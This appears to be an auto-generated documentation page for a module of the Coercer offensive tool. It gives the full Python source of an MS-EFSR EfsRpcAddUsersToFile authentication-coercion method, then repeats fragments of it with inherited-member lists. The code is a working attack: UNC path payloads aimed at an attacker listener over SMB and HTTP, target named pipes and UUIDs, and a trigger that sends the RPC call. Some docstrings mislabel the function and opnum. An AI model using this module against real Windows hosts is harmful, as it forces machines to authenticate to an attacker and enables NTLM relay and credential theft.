coercer.methods.MS_EFSR.EfsRpcAddUsersToFile
1#!/usr/bin/env python3 2# -*- coding: utf-8 -*- 3# File name : EfsRpcAddUsersToFile.py 4# Author : XiaoliChan 5# Date created : 18 Mar 2023 6 7 8from coercer.models.MSPROTOCOLRPCCALL import MSPROTOCOLRPCCALL 9from coercer.network.DCERPCSessionError import DCERPCSessionError 10from impacket.dcerpc.v5.ndr import NDRCALL, NDRSTRUCT 11from impacket.dcerpc.v5.dtypes import UUID, ULONG, WSTR, DWORD, LONG, NULL, BOOL, UCHAR, PCHAR, RPC_SID, LPWSTR, GUID 12 13class EFS_HASH_BLOB(NDRSTRUCT): 14 structure = ( 15 ('Data', DWORD), 16 ('cbData', PCHAR), 17 ) 18 19class ENCRYPTION_CERTIFICATE_HASH(NDRSTRUCT): 20 structure = ( 21 ('Lenght', DWORD), 22 ('SID', RPC_SID), 23 ('Hash', EFS_HASH_BLOB), 24 ('Display', LPWSTR), 25 ) 26 27class ENCRYPTION_CERTIFICATE_LIST(NDRSTRUCT): 28 structure = ( 29 ('nUsers', DWORD), 30 ('Users', ENCRYPTION_CERTIFICATE_HASH), 31 ) 32 33class _EfsRpcAddUsersToFile(NDRCALL): 34 """ 35 Structure to make the RPC call to EfsRpcAddUsersToFile() in [MS-EFSR Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/afd56d24-3732-4477-b5cf-44cc33848d85) 36 """ 37 opnum = 9 38 structure = ( 39 ('FileName', WSTR), # Type: wchar_t * 40 ('EncryptionCertificates', ENCRYPTION_CERTIFICATE_LIST) 41 ) 42 43class _EfsRpcAddUsersToFileResponse(NDRCALL): 44 """ 45 Structure to parse the response of the RPC call to EfsRpcDecryptFileSrv() in [MS-EFSR Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/08796ba8-01c8-4872-9221-1000ec2eff31) 46 """ 47 structure = () 48 49 50class EfsRpcAddUsersToFile(MSPROTOCOLRPCCALL): 51 """ 52 Coercing a machine to authenticate using function EfsRpcDecryptFileSrv (opnum 5) of [MS-EFSR Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/08796ba8-01c8-4872-9221-1000ec2eff31) 53 54 Method found by: 55 - [@topotam77](https://twitter.com/topotam77) 56 """ 57 58 exploit_paths = [ 59 ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'), 60 ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'), 61 ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'), 62 ("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\file.txt\x00'), 63 ] 64 65 access = { 66 "ncan_np": [ 67 { 68 "namedpipe": r"\PIPE\efsrpc", 69 "uuid": "df1941c5-fe89-4e79-bf10-463657acf44d", 70 "version": "1.0" 71 }, 72 { 73 "namedpipe": r"\PIPE\lsarpc", 74 "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e", 75 "version": "1.0" 76 }, 77 { 78 "namedpipe": r"\PIPE\samr", 79 "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e", 80 "version": "1.0" 81 }, 82 { 83 "namedpipe": r"\PIPE\lsass", 84 "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e", 85 "version": "1.0" 86 }, 87 { 88 "namedpipe": r"\PIPE\netlogon", 89 "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e", 90 "version": "1.0" 91 }, 92 ], 93 "ncacn_ip_tcp": [ 94 { 95 "uuid": "df1941c5-fe89-4e79-bf10-463657acf44d", 96 "version": "1.0" 97 }, 98 { 99 "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e", 100 "version": "1.0" 101 } 102 ] 103 } 104 105 protocol = { 106 "longname": "[MS-EFSR]: Encrypting File System Remote (EFSRPC) Protocol", 107 "shortname": "MS-EFSR" 108 } 109 110 function = { 111 "name": "EfsRpcAddUsersToFile", 112 "opnum": 9, 113 "vulnerable_arguments": ["FileName"] 114 } 115 116 def trigger(self, dcerpc_session, target): 117 if dcerpc_session is not None: 118 try: 119 request = _EfsRpcAddUsersToFile() 120 request['FileName'] = self.path 121 resp = dcerpc_session.request(request) 122 return "" 123 except Exception as err: 124 return err 125 else: 126 print("[!] Error: dce is None, you must call connect() first.") 127 return None
class
EFS_HASH_BLOB(impacket.dcerpc.v5.ndr.NDRSTRUCT):
This will be the base class for all DCERPC NDR Types and represents a NDR Primitive Type
structure =
(('Data', <class 'impacket.dcerpc.v5.ndr.NDRULONG'>), ('cbData', <class 'impacket.dcerpc.v5.dtypes.PCHAR'>))
Inherited Members
- impacket.dcerpc.v5.ndr.NDR
- NDR
- referent
- commonHdr
- commonHdr64
- structure64
- align
- item
- fields
- changeTransferSyntax
- getDataLen
- isNDR
- dumpRaw
- dump
- calculatePad
- pack
- unpack
- impacket.dcerpc.v5.ndr.NDRSTRUCT
- getData
- fromString
- getAlignment
- impacket.dcerpc.v5.ndr.NDRCONSTRUCTEDTYPE
- isPointer
- isUnion
- getDataReferents
- getDataReferent
- calcPackSize
- getArrayMaximumSize
- getArraySize
- fromStringReferents
- fromStringReferent
- calcUnPackSize
class
ENCRYPTION_CERTIFICATE_HASH(impacket.dcerpc.v5.ndr.NDRSTRUCT):
20class ENCRYPTION_CERTIFICATE_HASH(NDRSTRUCT): 21 structure = ( 22 ('Lenght', DWORD), 23 ('SID', RPC_SID), 24 ('Hash', EFS_HASH_BLOB), 25 ('Display', LPWSTR), 26 )
This will be the base class for all DCERPC NDR Types and represents a NDR Primitive Type
structure =
(('Lenght', <class 'impacket.dcerpc.v5.ndr.NDRULONG'>), ('SID', <class 'impacket.dcerpc.v5.dtypes.RPC_SID'>), ('Hash', <class 'EFS_HASH_BLOB'>), ('Display', <class 'impacket.dcerpc.v5.dtypes.LPWSTR'>))
Inherited Members
- impacket.dcerpc.v5.ndr.NDR
- NDR
- referent
- commonHdr
- commonHdr64
- structure64
- align
- item
- fields
- changeTransferSyntax
- getDataLen
- isNDR
- dumpRaw
- dump
- calculatePad
- pack
- unpack
- impacket.dcerpc.v5.ndr.NDRSTRUCT
- getData
- fromString
- getAlignment
- impacket.dcerpc.v5.ndr.NDRCONSTRUCTEDTYPE
- isPointer
- isUnion
- getDataReferents
- getDataReferent
- calcPackSize
- getArrayMaximumSize
- getArraySize
- fromStringReferents
- fromStringReferent
- calcUnPackSize
class
ENCRYPTION_CERTIFICATE_LIST(impacket.dcerpc.v5.ndr.NDRSTRUCT):
28class ENCRYPTION_CERTIFICATE_LIST(NDRSTRUCT): 29 structure = ( 30 ('nUsers', DWORD), 31 ('Users', ENCRYPTION_CERTIFICATE_HASH), 32 )
This will be the base class for all DCERPC NDR Types and represents a NDR Primitive Type
structure =
(('nUsers', <class 'impacket.dcerpc.v5.ndr.NDRULONG'>), ('Users', <class 'ENCRYPTION_CERTIFICATE_HASH'>))
Inherited Members
- impacket.dcerpc.v5.ndr.NDR
- NDR
- referent
- commonHdr
- commonHdr64
- structure64
- align
- item
- fields
- changeTransferSyntax
- getDataLen
- isNDR
- dumpRaw
- dump
- calculatePad
- pack
- unpack
- impacket.dcerpc.v5.ndr.NDRSTRUCT
- getData
- fromString
- getAlignment
- impacket.dcerpc.v5.ndr.NDRCONSTRUCTEDTYPE
- isPointer
- isUnion
- getDataReferents
- getDataReferent
- calcPackSize
- getArrayMaximumSize
- getArraySize
- fromStringReferents
- fromStringReferent
- calcUnPackSize
51class EfsRpcAddUsersToFile(MSPROTOCOLRPCCALL): 52 """ 53 Coercing a machine to authenticate using function EfsRpcDecryptFileSrv (opnum 5) of [MS-EFSR Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/08796ba8-01c8-4872-9221-1000ec2eff31) 54 55 Method found by: 56 - [@topotam77](https://twitter.com/topotam77) 57 """ 58 59 exploit_paths = [ 60 ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'), 61 ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'), 62 ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'), 63 ("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\file.txt\x00'), 64 ] 65 66 access = { 67 "ncan_np": [ 68 { 69 "namedpipe": r"\PIPE\efsrpc", 70 "uuid": "df1941c5-fe89-4e79-bf10-463657acf44d", 71 "version": "1.0" 72 }, 73 { 74 "namedpipe": r"\PIPE\lsarpc", 75 "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e", 76 "version": "1.0" 77 }, 78 { 79 "namedpipe": r"\PIPE\samr", 80 "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e", 81 "version": "1.0" 82 }, 83 { 84 "namedpipe": r"\PIPE\lsass", 85 "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e", 86 "version": "1.0" 87 }, 88 { 89 "namedpipe": r"\PIPE\netlogon", 90 "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e", 91 "version": "1.0" 92 }, 93 ], 94 "ncacn_ip_tcp": [ 95 { 96 "uuid": "df1941c5-fe89-4e79-bf10-463657acf44d", 97 "version": "1.0" 98 }, 99 { 100 "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e", 101 "version": "1.0" 102 } 103 ] 104 } 105 106 protocol = { 107 "longname": "[MS-EFSR]: Encrypting File System Remote (EFSRPC) Protocol", 108 "shortname": "MS-EFSR" 109 } 110 111 function = { 112 "name": "EfsRpcAddUsersToFile", 113 "opnum": 9, 114 "vulnerable_arguments": ["FileName"] 115 } 116 117 def trigger(self, dcerpc_session, target): 118 if dcerpc_session is not None: 119 try: 120 request = _EfsRpcAddUsersToFile() 121 request['FileName'] = self.path 122 resp = dcerpc_session.request(request) 123 return "" 124 except Exception as err: 125 return err 126 else: 127 print("[!] Error: dce is None, you must call connect() first.") 128 return None
Coercing a machine to authenticate using function EfsRpcDecryptFileSrv (opnum 5) of MS-EFSR Protocol
Method found by:
exploit_paths =
[('smb', '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'), ('smb', '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'), ('smb', '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'), ('http', '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\file.txt\x00')]
access =
{'ncan_np': [{'namedpipe': '\\PIPE\\efsrpc', 'uuid': 'df1941c5-fe89-4e79-bf10-463657acf44d', 'version': '1.0'}, {'namedpipe': '\\PIPE\\lsarpc', 'uuid': 'c681d488-d850-11d0-8c52-00c04fd90f7e', 'version': '1.0'}, {'namedpipe': '\\PIPE\\samr', 'uuid': 'c681d488-d850-11d0-8c52-00c04fd90f7e', 'version': '1.0'}, {'namedpipe': '\\PIPE\\lsass', 'uuid': 'c681d488-d850-11d0-8c52-00c04fd90f7e', 'version': '1.0'}, {'namedpipe': '\\PIPE\\netlogon', 'uuid': 'c681d488-d850-11d0-8c52-00c04fd90f7e', 'version': '1.0'}], 'ncacn_ip_tcp': [{'uuid': 'df1941c5-fe89-4e79-bf10-463657acf44d', 'version': '1.0'}, {'uuid': 'c681d488-d850-11d0-8c52-00c04fd90f7e', 'version': '1.0'}]}
protocol =
{'longname': '[MS-EFSR]: Encrypting File System Remote (EFSRPC) Protocol', 'shortname': 'MS-EFSR'}
def
trigger(self, dcerpc_session, target):
117 def trigger(self, dcerpc_session, target): 118 if dcerpc_session is not None: 119 try: 120 request = _EfsRpcAddUsersToFile() 121 request['FileName'] = self.path 122 resp = dcerpc_session.request(request) 123 return "" 124 except Exception as err: 125 return err 126 else: 127 print("[!] Error: dce is None, you must call connect() first.") 128 return None